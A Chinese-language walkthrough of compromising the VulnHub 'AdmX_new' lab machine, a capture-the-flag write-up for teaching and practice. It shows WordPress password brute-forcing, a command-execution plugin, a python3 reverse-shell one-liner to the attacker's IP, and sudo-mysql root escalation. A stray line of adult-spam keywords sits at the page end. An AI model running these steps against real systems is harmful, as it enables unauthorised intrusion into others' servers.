<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    VulnHub靶機-AdmX_new | 紅隊打靶

    VSole2023-05-24 08:48:54

    AdmX_new靶場

    一、主機發現

    通過nmap進行主機發現

    nmap -sn 192.168.56.0/24

    靶機ip:192.168.56.108

    kali的ip:192.168.56.102

    二、對靶機進行信息收集

    1、對靶機開放的端口,運行服務,操作系統的版本進行探測

    nmap -sV -p- -O 192.168.56.108

    經歷一段時間的等待,發現靶機只開放了80端口,跑的是apache的http服務;操作系統判斷是Linux 4.15 - 5.6,或者Linux 5.0 - 5.4

    2、對80端口進行一個nmap漏洞庫的掃描

    nmap --script=vuln -p80 192.168.56.108

    掃描結果顯示有/wordpress和/wordpress/wp-login.php目錄

    3、使用瀏覽器對80端口進行訪問

    訪問的頁面為apache的默認頁面,沒有信息可以利用,進行目錄爆破

    4、對80端口進行目錄爆破,并進一步探測

    gobuster dir -u http://192.168.56.108 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

    發現了兩個目錄,tools和wordpress,又再一次出現了wordpress,那么可以猜測這個網站是一個wordpress的cms搭建的,拼接tools訪問,沒有權限;憑借wordpress訪問,發現的頁面不像一個cms所擁有的頁面,而且訪問速度很慢;

    打開開發工具,對數據包進行檢查

    發現數據包對192.168.159.145進行一個訪問,訪問的內容都是關于wordpress的一些js文件,而192.168.159.145不存在

    會不會是之前在編寫代碼的時候,靶機的ip為192.168.159.145,但是現在靶機的ip改了,使用burp進行替換,將數據包的192.168.159.145換成192.168.56.108,需要將響應頭和請求體都替換。

    瀏覽器重新訪問80端口的wprdpress目錄

    對wordpress目錄進行目錄爆破gobuster dir -u http://192.168.56.108/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

    發現有admin目錄,指向wp-admin,那么拼接wp-admin進行訪問

    來到后臺地址,嘗試一下弱口令admin admin

    提示密碼錯誤,證明存在admin的用戶名

    三、獲取初始shell


    1、已知admin用戶名,使用弱密碼進行爆破

    使用burp的自動批量發送進行爆破

    利用返回長度去進行篩選

    密碼為adam14

    登錄

    2、獲取shell

    wordpress的管理員后臺有三個可以利用的地方:

    a、media處的文件上傳

    b、appearance的theme editor修改外觀主題,404模板,寫入反彈shell,可以更新即可以利用

    c、plugins上傳插件(插件的默認位置url/wordpress/wp-admin/plugins/上傳的插件名稱)

    這里先嘗試后兩個:

    (1)、appearance的theme editor修改外觀主題的404模板

    先判斷是否可以寫入,尾部寫入echo 123;

    點擊update file

    發現不能修改文件,那么嘗試第二種

    (2)、plugins上傳插件

    編寫一個自定義插件,寫入可以執行系統命令的代碼,這里需要注意,編寫wordpress的自定義代碼需要加注釋,這些注釋必不可少,不然wordpress不會去執行;上傳插件得進行壓縮

    壓縮 zip wordpress_plugin.zip wordpress_plugin.php

    上傳插件

    上傳成功,點擊activate plugin,插件的默認位置url/wordpress/wp-admin/plugins/上傳的插件名稱

    訪問這個插件:http://192.168.56.108/wordpress/wp-admin/plugins/wordpress_plugin.php?cmd=id

    輸出了id

    為什么不直接在插件里面寫入反彈shell呢?因為不知道有沒有可以利用的工具來進行反彈shell,不清楚是否有nc,python,bash等等,那么寫入可以執行系統命令的代碼,可以去查找是否存在這些工具。

    存在nc,python3,bash

    方法一、使用python3進行反彈shell

    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

    獲得了初始shell

    方法二、使用蟻劍連接shell

    使用蟻劍連接,則插件里面的代碼需要改成一句話木馬

    蟻劍連接

    四、提權

    1、第一次提權(wpadmin)

    當前用戶www-date,sudo -l 沒有不用root密碼就可以執行的文件

    查看自動任務 cat /etc/crontab

    發現有定時任務,但是這個定時任務的目錄下,發現有文件,但是沒有權限

    ls /home 發現home目錄下有一個wpadmin用戶

    在wordpress目錄下有網站的配置文件,wp-config.php

    cat wp-config.php, 發現有數據庫的密碼和用戶,那么嘗試連接數據庫

    mysql -u admin -p Wp_Admin#123,發現不能登錄,結合前面信息收集,那么一共得到兩個密碼,使用這兩個密碼嘗試去登錄wpadmin用戶

    當嘗試到adam14的時候,進入了wpadmin用戶

    2、第二次提權(root)

    python3 -c 'import pty;pty.spawn("/bin/bash")'

    提高交互性

    sudo -l 有可以提升權限的文件

    輸入sudo /usr/bin/mysql -u root -D wordpress -p 進入數據庫

    使用mysql自帶的system命令

    system id 發現為root用戶

    system /bin/bash

    提升為root權限

    拿到flag

    wordpresssocket
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    cmd=id輸出了id為什么不直接在插件里面寫入反彈shell呢?因為不知道有沒有可以利用的工具來進行反彈shell,不清楚是否有nc,python,bash等等,那么寫入可以執行系統命令的代碼,可以去查找是否存在這些工具。發現為root用戶system /bin/bash提升為root權限拿到flag
    nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target. nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target. NetCat,它的實際可運行的名字叫nc,應該早很就被提供,就象另一個沒有公開但是標準的Unix工具。
    該漏洞是CGI腳本在處理authentication.cgi請求,來讀取POST參數中的"password"參數的值時造成的緩沖區溢出。
    通過流量審查技術,審查者可以獲取通信過程的雙方連接信息、雙方身份信息以及流量屬性,從而進行進一步的利用或者破壞。在社會安全領域,流量審查甚至能夠防止恐怖分子的恐怖襲擊、追查嫌疑犯的動向,為社會治安帶來新的突破口。從社會安定、國家安全方面來看,應該適當發展流量審查技術,同時應該對這種技術實行嚴格的管控,避免其成為隱患,造成不可估量的損失。
    關于遠程代碼執行的常用Payload大家好,我是 Ansar Uddin,我是來自孟加拉國的網絡安全研究員。這是我的第二篇 Bug 賞金文章。今天的話題都是關于 Rce 的利用。攻擊者的能力取決于服務器端解釋器的限制。在某些情況下,攻擊者可能能夠從代碼注入升級為命令注入。
    在完成了這項針對 Linux 中多個受控制用戶空間的基礎性工作后,Linux 容器開始逐漸成形并最終發展成了現在的模樣。開源 Docker 社區致力于改進這類技術,并免費提供給所有用戶,使之獲益。除了運行容器之外,Docker 技術還具備其他多項功能,包括簡化用于構建容器、傳輸鏡像以及控制鏡像版本的流程。與此相反,Docker 技術鼓勵應用程序各自獨立運行其進程,并提供相應工具以實現這一功能。
    網絡安全研究人員在WordPress的LiteSpeed Cache插件中發現了一個重大漏洞(編號為CVE-2023-40000),該插件擁有超過400萬次活動安裝,并存在未經身份驗證的站點范圍存儲 XSS(跨站點腳本)的風險。這可能會允許未經授權訪問敏感信息或通過單個HTTP請求在受影響的WordPress網站上進行權限升級。該漏洞由Patchstack團隊發現,問題已在插件版本5.7.0.1中
    WordPress的Bricks主題中的一個關鍵安全漏洞被發現并有被積極利用趨勢,該漏洞被跟蹤為CVE-2024-25600(CVSS 評分:9.8),使未經身份驗證的攻擊者能夠實現遠程代碼執行。它會影響1.9.6之前的所有版本的Bricks。主題開發人員已在2024年2月13日發布的1.9.6.1版本中解決了這個問題,據估計,Bricks目前約有25000個活躍網站。建議使用該插件的用戶應用最新
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类